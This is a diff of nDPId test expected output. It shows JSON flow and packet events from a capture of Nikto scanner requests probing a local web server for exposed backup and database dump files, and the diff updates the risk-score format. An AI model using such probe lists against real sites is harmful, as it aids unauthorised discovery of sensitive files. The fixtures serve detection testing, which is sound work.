 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":202,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":202,"flow_packet_id":1,"flow_last_seen":1576420276986,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"ts_msec":1576420276986,"pkt":"AAAAAAAAAAAAAAAACABFAADC6rNAAEAGUYB\/AAABfwAAAcMcH5BJJNLw4gK1PYAYAED+tgAAAQEICp1m\/CKdZvwiR0VUIC9iYWNrdXAuemlwIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
-00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":202,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276986,"flow_last_seen":1576420276986,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420276986,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49948,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":202,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276986,"flow_last_seen":1576420276986,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420276986,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49948,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":203,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276987,"flow_last_seen":1576420276987,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420276987,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49950,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":203,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":203,"flow_packet_id":1,"flow_last_seen":1576420276987,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"ts_msec":1576420276987,"pkt":"AAAAAAAAAAAAAAAACABFAADABtBAAEAGNWZ\/AAABfwAAAcMeH5DVkj6SMBYRsYAYAED+tAAAAQEICp1m\/COdZvwjR0VUIC9zaXRlLnppcCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":203,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276987,"flow_last_seen":1576420276987,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420276987,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49950,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":203,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276987,"flow_last_seen":1576420276987,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420276987,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49950,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":204,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276989,"flow_last_seen":1576420276989,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420276989,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49952,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":204,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":204,"flow_packet_id":1,"flow_last_seen":1576420276989,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"ts_msec":1576420276989,"pkt":"AAAAAAAAAAAAAAAACABFAADAb4pAAEAGzKt\/AAABfwAAAcMgH5DktVfY9BOJ1YAYAED+tAAAAQEICp1m\/CWdZvwlR0VUIC9zaXRlLnppcCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":204,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276989,"flow_last_seen":1576420276989,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420276989,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49952,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":204,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276989,"flow_last_seen":1576420276989,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420276989,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49952,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":205,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276990,"flow_last_seen":1576420276990,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"ts_msec":1576420276990,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49954,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":205,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":205,"flow_packet_id":1,"flow_last_seen":1576420276990,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"ts_msec":1576420276990,"pkt":"AAAAAAAAAAAAAAAACABFAADGkTtAAEAGqvR\/AAABfwAAAcMiH5BqAalni+2D0IAYAED+ugAAAQEICp1m\/CadZvwmR0VUIC8xMjcuMC4wLnRhci5neiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
-00867{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":205,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276990,"flow_last_seen":1576420276990,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"ts_msec":1576420276990,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49954,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":205,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276990,"flow_last_seen":1576420276990,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"ts_msec":1576420276990,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49954,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":206,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276992,"flow_last_seen":1576420276992,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"ts_msec":1576420276992,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49956,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":206,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":206,"flow_packet_id":1,"flow_last_seen":1576420276992,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"ts_msec":1576420276992,"pkt":"AAAAAAAAAAAAAAAACABFAADGaPFAAEAG0z5\/AAABfwAAAcMkH5B8x1CQWvOvzIAYAED+ugAAAQEICp1m\/CidZvwoR0VUIC8xMjcuMC4wLnRhci5neiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
-00867{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":206,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276992,"flow_last_seen":1576420276992,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"ts_msec":1576420276992,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49956,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":206,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276992,"flow_last_seen":1576420276992,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"ts_msec":1576420276992,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49956,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":207,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276993,"flow_last_seen":1576420276993,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420276993,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49958,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":207,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":207,"flow_packet_id":1,"flow_last_seen":1576420276993,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"ts_msec":1576420276993,"pkt":"AAAAAAAAAAAAAAAACABFAADFOFRAAEAGA91\/AAABfwAAAcMmH5DTogAzSwYGfYAYAED+uQAAAQEICp1m\/CmdZvwpR0VUIC8xMjdfMF8wXzEudGd6IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":207,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276993,"flow_last_seen":1576420276993,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420276993,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49958,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":207,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276993,"flow_last_seen":1576420276993,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420276993,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49958,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":208,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276995,"flow_last_seen":1576420276995,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420276995,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49960,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":208,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":208,"flow_packet_id":1,"flow_last_seen":1576420276995,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"ts_msec":1576420276995,"pkt":"AAAAAAAAAAAAAAAACABFAADFLPBAAEAGD0F\/AAABfwAAAcMoH5DgsBSPBaIHeIAYAED+uQAAAQEICp1m\/CudZvwrR0VUIC8xMjdfMF8wXzEudGd6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="}
-00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":208,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276995,"flow_last_seen":1576420276995,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420276995,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49960,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":208,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276995,"flow_last_seen":1576420276995,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420276995,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49960,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":209,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276996,"flow_last_seen":1576420276996,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1576420276996,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49962,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":209,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":209,"flow_packet_id":1,"flow_last_seen":1576420276996,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"ts_msec":1576420276996,"pkt":"AAAAAAAAAAAAAAAACABFAADD0zFAAEAGaQF\/AAABfwAAAcMqH5Dy3etP7K3wrYAYAED+twAAAQEICp1m\/CydZvwsR0VUIC8xMjcuMC4wLnNxbCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="}
-00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":209,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276996,"flow_last_seen":1576420276996,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1576420276996,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49962,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":209,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276996,"flow_last_seen":1576420276996,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1576420276996,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49962,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":210,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276998,"flow_last_seen":1576420276998,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1576420276998,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49964,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
